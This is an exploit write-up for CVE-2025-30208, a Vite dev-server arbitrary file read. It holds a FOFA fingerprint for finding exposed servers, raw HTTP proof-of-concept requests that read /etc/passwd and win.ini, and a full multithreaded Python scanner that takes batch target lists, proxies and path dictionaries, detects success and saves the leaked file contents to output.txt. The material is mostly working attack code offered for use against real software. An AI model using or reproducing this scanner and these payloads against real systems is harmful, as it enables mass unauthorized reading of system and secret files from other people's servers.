## Vite Dev Server Arbitrary File Read Vulnerability (CVE-2025-30208)
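Vite's dev server can serve files outside the project root via the `/@fs/` path, normally restricted by its `server.fs` allow/deny lists. According to the advisory for CVE-2025-30208, appending `?raw??` or `?import&raw??` to a request URL bypasses these checks: trailing `?` separators are stripped in several places but are not accounted for in the query-string regexes, so the dev server returns the raw file contents. Only instances that expose the dev server to the network (e.g. via `--host` or `server.host`) are reachable for this attack.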
## FOFA
```
body="/@vite/client"
```
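The query above matches pages that reference Vite's dev-time client script. The same fingerprint can be checked directly before sending any payload; a minimal sketch in Python (the target URL and port 5173, Vite's default dev port, are placeholder assumptions):

```
import requests

def looks_like_vite_dev(base_url):
    """Heuristic check: Vite dev pages load the /@vite/client HMR script."""
    try:
        resp = requests.get(base_url, timeout=5, verify=False)
        return "/@vite/client" in resp.text
    except requests.RequestException:
        return False

# Placeholder target; adjust host and port to the instance under test.
print(looks_like_vite_dev("http://127.0.0.1:5173/"))
```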
## POC (Linux)
```
GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```
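A vulnerable instance answers `200` with the file contents, so a line such as `root:x:0:0:root:/root:/bin/bash` confirms the read; patched versions typically deny the request with a `403`.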
## POC (Windows)
```
GET /@fs/C://Windows/win.ini?import&raw?? HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```
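Success on Windows shows the contents of `win.ini`, which usually begins with `; for 16-bit app support`.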
## Python script
```
import requests
import argparse
import urllib3
import concurrent.futures
import re
import time
from urllib.parse import urljoin
from colorama import Fore, Style, init

# Initialize colorama (enables colored output on Windows as well)
init(autoreset=True)

# Suppress SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Maximum number of retries
RETRY_LIMIT = 3


def sanitize_filename(url):
    """Sanitize a URL for use as a filename by removing illegal characters."""
    safe_name = re.sub(r'[^\w\-]', '_', url)   # replace illegal characters
    safe_name = re.sub(r'_+', '_', safe_name)  # collapse repeated `_`
    safe_name = safe_name.strip('_')           # strip leading/trailing `_`
    return safe_name


def fetch_url(url, proxy, retries=0):
    """Fetch a URL, retrying with exponential backoff on request errors."""
    proxies = {"http": proxy, "https": proxy} if proxy else None
    try:
        response = requests.get(url, timeout=5, verify=False, proxies=proxies, allow_redirects=False)
        if response.status_code == 200:
            return response.text
        print(f"[FAIL] {url} returned {response.status_code}")
        return None
    except requests.exceptions.RequestException:
        # ConnectionError is a subclass of RequestException, so one handler covers both
        if retries < RETRY_LIMIT:
            wait_time = 2 ** retries  # exponential backoff
            print(f"[ERROR] connect error to {url} - Retrying...")
            time.sleep(wait_time)
            return fetch_url(url, proxy, retries + 1)
        print(f"[ERROR] connect error to {url} after {RETRY_LIMIT} retries")
        return None


def check_url(base_url, paths, proxy, output_file):
    """Join each path onto the base URL and check whether it is readable."""
    results = []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        futures = {}
        for path in paths:
            url = urljoin(base_url, path)
            if "?raw" not in url:
                url += "?raw"
            futures[executor.submit(fetch_url, url, proxy)] = url  # one concurrent request per path

        for future in concurrent.futures.as_completed(futures):
            url = futures[future]
            content = future.result()
            if content:
                if "/etc/passwd" in url:  # /etc/passwd path: just report SUCCESS
                    print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}")
                elif "/root:/bin/bash" in content:  # passwd-like content: report and save
                    result = f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}"
                    print(result)
                    if output_file:  # guard: no file handle is passed in single-URL mode
                        # append to output.txt
                        output_file.write(result + "\n")
                        output_file.write(content + "\n")
                    results.append(result)
                else:
                    print(f"[FAIL] {url} does not contain expected content")
    return results


def check_urls_from_file(file_path, paths, proxy):
    """Read base URLs from a file and check them concurrently with a thread pool."""
    with open(file_path, 'r') as file:
        links = [line.strip() for line in file.readlines()]

    print(f"[INFO] Processing {len(links)} base URLs with concurrent requests.")

    # Open output.txt in append mode
    with open("output.txt", "a") as output_file:
        results = []
        with concurrent.futures.ThreadPoolExecutor() as executor:
            futures = {executor.submit(check_url, link, paths, proxy, output_file): link for link in links}
            for future in concurrent.futures.as_completed(futures):
                result = future.result()
                if result:
                    results.extend(result)


def check_urls_from_dict(paths, proxy):
    """When only -d is given, treat each dictionary entry as a full URL to check."""
    print(f"[INFO] Processing {len(paths)} paths concurrently.")

    results = []
    with open("output.txt", "a") as output_file:  # open output.txt in append mode
        with concurrent.futures.ThreadPoolExecutor() as executor:
            futures = {}
            for path in paths:
                futures[executor.submit(fetch_url, path, proxy)] = path

            for future in concurrent.futures.as_completed(futures):
                path = futures[future]
                content = future.result()
                if content:
                    if "/etc/passwd" in path:  # /etc/passwd path: just report SUCCESS
                        print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}")
                    elif "/root:/bin/bash" in content:  # passwd-like content: report and save
                        result = f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}"
                        print(result)
                        # append to output.txt
                        output_file.write(result + "\n")
                        output_file.write(content + "\n")
                        results.append(result)
                    else:
                        print(f"[FAIL] {path} does not contain expected content")
    return results


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Batch check access to multiple paths on multiple links")
    parser.add_argument("-f", "--file", help="File containing base links")
    parser.add_argument("-u", "--url", help="Target URL")
    parser.add_argument("-p", "--payload", default='/etc/passwd', help="Target file path")
    parser.add_argument("-d", "--dict", help="File containing list of paths to append to base URL")
    parser.add_argument("--proxy", help="Proxy server (e.g., http://proxy:port)")
    args = parser.parse_args()

    paths = []
    if args.dict:
        with open(args.dict, 'r') as dict_file:
            paths = [line.strip() for line in dict_file.readlines()]
    else:
        paths.append(args.payload)

    # Single URL
    if args.url:
        check_url(args.url, paths, args.proxy, None)
    # Multiple URLs from a file
    elif args.file:
        check_urls_from_file(args.file, paths, args.proxy)
    # -d alone: check the dictionary entries as full URLs
    elif args.dict:
        check_urls_from_dict(paths, args.proxy)
    else:
        print("Usage: python3 script.py -h")
```
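Example invocations, assuming the script is saved as `poc.py` (the script and input file names are placeholders):

```
# single target, default /etc/passwd payload
python3 poc.py -u http://127.0.0.1:5173/

# batch mode: one base URL per line, optionally routed through a proxy
python3 poc.py -f urls.txt --proxy http://127.0.0.1:8080

# treat each line of paths.txt as a full URL to request
python3 poc.py -d paths.txt
```

In the batch modes, confirmed hits are appended to `output.txt` along with the leaked file contents.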